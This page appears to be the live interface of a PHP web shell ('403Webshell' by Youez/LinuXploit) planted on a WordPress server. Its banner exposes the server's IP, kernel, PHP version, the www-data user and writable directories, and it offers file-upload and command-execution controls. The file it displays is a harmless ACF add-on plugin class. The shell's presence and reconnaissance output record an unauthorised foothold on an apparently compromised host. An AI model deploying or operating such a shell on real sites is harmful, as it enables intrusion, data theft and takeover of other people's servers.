403Webshell
Server IP : 5.129.245.98  /  Your IP : 216.73.216.246
Web Server : Apache/2.4.66 (Debian)
System : Linux 1b8c17c336b9 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/wp-content/plugins/wpai-acf-add-on/src/fields/acf/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wp-content/plugins/wpai-acf-add-on/src/fields/acf/FieldValidatedField.php
<?php

namespace wpai_acf_add_on_pro\fields\acf;

use pmai_acf_add_on\fields\Field;

/**
 * Class FieldValidateField
 * @package pmai_acf_add_on\fields\acf
 */
class FieldValidateField extends Field {

    /**
     *  Field type key
     */
    public $type = 'validated_field';

    /**
     *
     * Parse field data
     *
     * @param $xpath
     * @param $parsingData
     * @param array $args
     */
    public function parse($xpath, $parsingData, $args = array()) {
        parent::parse($xpath, $parsingData, $args);
        if ("" != $xpath) {
            $field = $this->getOption('field');
            if (!empty($field['sub_field'])) {
                $this->setOption('field', $field['sub_field']);
            }
            $values = $this->getByXPath($xpath);
            $this->setOption('values', $values);
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit